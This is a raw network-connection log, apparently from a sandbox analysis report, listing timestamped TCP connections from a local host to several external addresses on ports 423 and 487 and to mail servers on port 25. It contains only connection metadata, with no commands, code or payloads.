Sep 5, 2021 15:50:34.081871986 CEST	423	49956	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:34.081933975 CEST	49956	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.082098007 CEST	49957	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.082156897 CEST	49958	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.082681894 CEST	49963	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.083142042 CEST	49964	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.108712912 CEST	423	49963	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:34.108974934 CEST	49963	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.112057924 CEST	423	49957	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:34.112159967 CEST	49957	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.115525007 CEST	423	49958	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:34.115576029 CEST	423	49964	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:34.115675926 CEST	49958	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.115755081 CEST	49964	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.122939110 CEST	423	49961	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:34.123192072 CEST	49961	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.124147892 CEST	423	49962	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:34.124305964 CEST	49962	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.135852098 CEST	423	49963	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:34.136060953 CEST	49963	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.147022963 CEST	423	49964	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:34.147345066 CEST	49964	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.163393021 CEST	423	49963	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:34.167941093 CEST	423	49962	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:34.178002119 CEST	423	49964	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:34.195352077 CEST	423	49961	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:34.305160999 CEST	49959	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:34.305398941 CEST	49960	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:34.305708885 CEST	49965	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:34.306126118 CEST	49966	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:34.373013973 CEST	423	49959	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:34.373107910 CEST	49959	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:34.376559973 CEST	423	49965	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:34.376642942 CEST	49965	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:34.376851082 CEST	423	49960	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:34.376924038 CEST	49960	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:34.379754066 CEST	423	49966	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:34.379838943 CEST	49966	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:34.437100887 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.448035955 CEST	423	49965	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:34.448266983 CEST	49965	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:34.453748941 CEST	423	49966	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:34.453963995 CEST	49966	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:34.476934910 CEST	49961	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.476974010 CEST	49962	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.476999998 CEST	49963	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.477457047 CEST	49969	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.477838993 CEST	49970	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.478238106 CEST	49971	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.502531052 CEST	423	49963	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:34.502659082 CEST	49963	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.503444910 CEST	423	49971	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:34.503563881 CEST	49971	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.504884958 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.504995108 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.518433094 CEST	423	49962	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:34.518471003 CEST	423	49970	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:34.518539906 CEST	49962	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.518573046 CEST	49970	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.519088984 CEST	423	49965	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:34.527374983 CEST	423	49966	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:34.528924942 CEST	423	49971	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:34.529134035 CEST	49971	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:34.549141884 CEST	423	49961	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:34.549235106 CEST	49961	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.550959110 CEST	423	49969	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:34.551054955 CEST	49969	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.554274082 CEST	423	49971	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:34.559916019 CEST	423	49970	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:34.560106993 CEST	49970	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:34.600816011 CEST	423	49970	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:34.601985931 CEST	49964	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.602963924 CEST	49972	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.624558926 CEST	423	49969	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:34.624872923 CEST	49969	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:34.633855104 CEST	423	49972	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:34.634017944 CEST	49972	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.638694048 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.638978004 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.644651890 CEST	423	49964	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:34.644745111 CEST	49964	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.665222883 CEST	423	49972	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:34.672935963 CEST	49972	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:34.698611021 CEST	423	49969	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:34.703677893 CEST	423	49972	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:34.706496000 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.723700047 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:34.724746943 CEST	49974	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:34.751312017 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:34.751482964 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:34.756457090 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.760441065 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.760514021 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.781116962 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:34.827964067 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.828037024 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.828726053 CEST	25	49974	40.93.207.1	192.168.2.4
Sep 5, 2021 15:50:34.828819990 CEST	49974	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:34.828871965 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.828993082 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.829258919 CEST	49974	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:34.829534054 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.883184910 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:34.899051905 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.899250031 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.899328947 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.899374962 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.899427891 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.899492979 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.899537086 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.899581909 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.899626017 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:34.900763035 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:34.928189039 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:34.932799101 CEST	25	49974	40.93.207.1	192.168.2.4
Sep 5, 2021 15:50:34.934314966 CEST	25	49974	40.93.207.1	192.168.2.4
Sep 5, 2021 15:50:34.934432030 CEST	49974	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:34.934575081 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:34.935703039 CEST	25	49974	40.93.207.1	192.168.2.4
Sep 5, 2021 15:50:34.935767889 CEST	49974	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:34.943216085 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:34.967655897 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.967677116 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.967694998 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.967710972 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.968322992 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.968344927 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.968432903 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.968791008 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:34.971061945 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.003412962 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:35.015234947 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:35.015393972 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:35.015455961 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:35.015674114 CEST	49968	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:35.037774086 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.067636013 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.084796906 CEST	487	49968	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:35.175448895 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:35.180105925 CEST	49965	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.180164099 CEST	49966	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.180650949 CEST	49976	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.181363106 CEST	49977	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.195768118 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:35.249299049 CEST	423	49977	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:35.249411106 CEST	49977	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.251414061 CEST	423	49965	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:35.251507044 CEST	49965	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.253473997 CEST	423	49966	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:35.253540993 CEST	49966	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.262742996 CEST	423	49976	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:35.262847900 CEST	49976	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.305104971 CEST	49970	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.305144072 CEST	49971	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.305628061 CEST	49978	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.306056023 CEST	49979	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.310184002 CEST	25	49975	208.77.151.115	192.168.2.4
Sep 5, 2021 15:50:35.310291052 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:35.313277960 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:35.318501949 CEST	423	49977	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:35.318713903 CEST	49977	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.330987930 CEST	423	49971	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:35.331053019 CEST	49971	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.331173897 CEST	423	49979	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:35.331302881 CEST	49979	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.341475010 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.345276117 CEST	423	49976	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:35.345514059 CEST	49976	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.346342087 CEST	423	49970	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:35.346473932 CEST	49970	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.346719980 CEST	423	49978	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:35.346810102 CEST	49978	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.356853962 CEST	423	49979	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:35.357084036 CEST	49979	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.378169060 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:35.382608891 CEST	423	49979	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:35.386686087 CEST	423	49977	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:35.389173031 CEST	423	49978	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:35.389447927 CEST	49978	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.405488968 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.405524969 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.405550957 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.405572891 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.405595064 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.427767038 CEST	423	49976	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:35.430197001 CEST	49972	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:35.430211067 CEST	49969	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:35.430510998 CEST	423	49978	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:35.430733919 CEST	49980	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:35.431226969 CEST	49981	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:35.461375952 CEST	423	49972	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:35.461477995 CEST	49972	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:35.462296009 CEST	423	49981	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:35.462390900 CEST	49981	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:35.493696928 CEST	423	49981	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:35.493932009 CEST	49981	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:35.499598026 CEST	423	49980	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:35.499702930 CEST	49980	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:35.503851891 CEST	423	49969	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:35.503945112 CEST	49969	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:35.517011881 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.517036915 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.517198086 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:35.525177002 CEST	423	49981	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:35.526808977 CEST	49973	25	192.168.2.4	108.177.119.27
Sep 5, 2021 15:50:35.554157972 CEST	25	49973	108.177.119.27	192.168.2.4
Sep 5, 2021 15:50:35.564080954 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:35.567775011 CEST	25	49975	208.77.151.115	192.168.2.4
Sep 5, 2021 15:50:35.568965912 CEST	423	49980	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:35.569140911 CEST	49980	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:35.637921095 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:35.638055086 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:35.638067961 CEST	423	49980	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:35.695813894 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:35.777405977 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:35.777741909 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:35.806845903 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:35.820866108 CEST	49978	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.820869923 CEST	49976	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.820877075 CEST	49977	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.820889950 CEST	49979	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.821562052 CEST	49983	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.822031021 CEST	49984	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.822475910 CEST	49985	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.823028088 CEST	49986	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.846623898 CEST	423	49979	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:35.846730947 CEST	49979	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.847755909 CEST	423	49986	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:35.847805977 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:35.847909927 CEST	49986	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.852020025 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:35.863879919 CEST	423	49978	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:35.863929987 CEST	423	49985	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:35.864016056 CEST	49978	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.864073992 CEST	49985	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:35.868243933 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:35.872937918 CEST	423	49986	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:35.888827085 CEST	423	49977	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:35.888983011 CEST	49977	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.894428015 CEST	423	49984	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:35.894565105 CEST	49984	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:35.894891024 CEST	423	49983	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:35.894973993 CEST	49983	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.900970936 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:35.901074886 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:35.902785063 CEST	423	49976	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:35.902877092 CEST	49976	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:35.905530930 CEST	423	49985	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:35.940638065 CEST	25	49975	208.77.151.115	192.168.2.4
Sep 5, 2021 15:50:35.956826925 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:35.969244003 CEST	423	49984	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:35.969290972 CEST	423	49983	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:35.992670059 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:35.992788076 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:35.992803097 CEST	49986	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:35.992825985 CEST	49985	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:36.086405993 CEST	49983	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:36.153167009 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:36.155977964 CEST	49986	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:36.158354044 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.181057930 CEST	423	49986	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:36.182075977 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.193773031 CEST	49985	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:36.193933010 CEST	49983	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:36.194139004 CEST	49984	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:36.195784092 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:36.214024067 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.214097023 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:36.220801115 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:36.232129097 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.232386112 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.234687090 CEST	423	49985	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:36.242324114 CEST	423	49984	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:36.242458105 CEST	49984	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:36.266602993 CEST	423	49984	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:36.267026901 CEST	423	49983	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:36.273932934 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.273946047 CEST	49981	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:36.274471045 CEST	49988	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:36.277851105 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.286261082 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:36.287174940 CEST	25	49975	208.77.151.115	192.168.2.4
Sep 5, 2021 15:50:36.295075893 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.296672106 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.297019005 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.297050953 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.300195932 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.300292969 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.300353050 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.300435066 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.300503016 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.305100918 CEST	423	49981	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:36.305188894 CEST	49981	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:36.306287050 CEST	423	49988	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:36.306385040 CEST	49988	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:36.310790062 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:36.320524931 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:36.338778973 CEST	423	49988	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:36.339025974 CEST	49988	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:36.340260029 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.345295906 CEST	49926	25	192.168.2.4	198.54.122.213
Sep 5, 2021 15:50:36.359152079 CEST	49987	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:36.371483088 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.371516943 CEST	423	49988	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:36.373883963 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.374072075 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.376347065 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.416070938 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.416136980 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.416251898 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.417717934 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.417814016 CEST	49982	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.491169930 CEST	487	49982	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:36.499481916 CEST	25	49975	208.77.151.115	192.168.2.4
Sep 5, 2021 15:50:36.550137997 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:36.550316095 CEST	25	49926	198.54.122.213	192.168.2.4
Sep 5, 2021 15:50:36.560079098 CEST	25	49975	208.77.151.115	192.168.2.4
Sep 5, 2021 15:50:36.560132027 CEST	25	49975	208.77.151.115	192.168.2.4
Sep 5, 2021 15:50:36.560184956 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:36.626276016 CEST	49926	25	192.168.2.4	198.54.122.213
Sep 5, 2021 15:50:36.633400917 CEST	49980	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:36.634179115 CEST	49989	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:36.670356035 CEST	49975	25	192.168.2.4	208.77.151.115
Sep 5, 2021 15:50:36.701973915 CEST	423	49989	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:36.702075958 CEST	49989	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:36.703526020 CEST	423	49980	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:36.703605890 CEST	49980	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:36.770134926 CEST	423	49989	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:36.771629095 CEST	49989	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:36.794835091 CEST	25	49987	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:36.803320885 CEST	25	49975	208.77.151.115	192.168.2.4
Sep 5, 2021 15:50:36.808888912 CEST	49990	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:36.825381041 CEST	49987	25	192.168.2.4	142.250.150.27
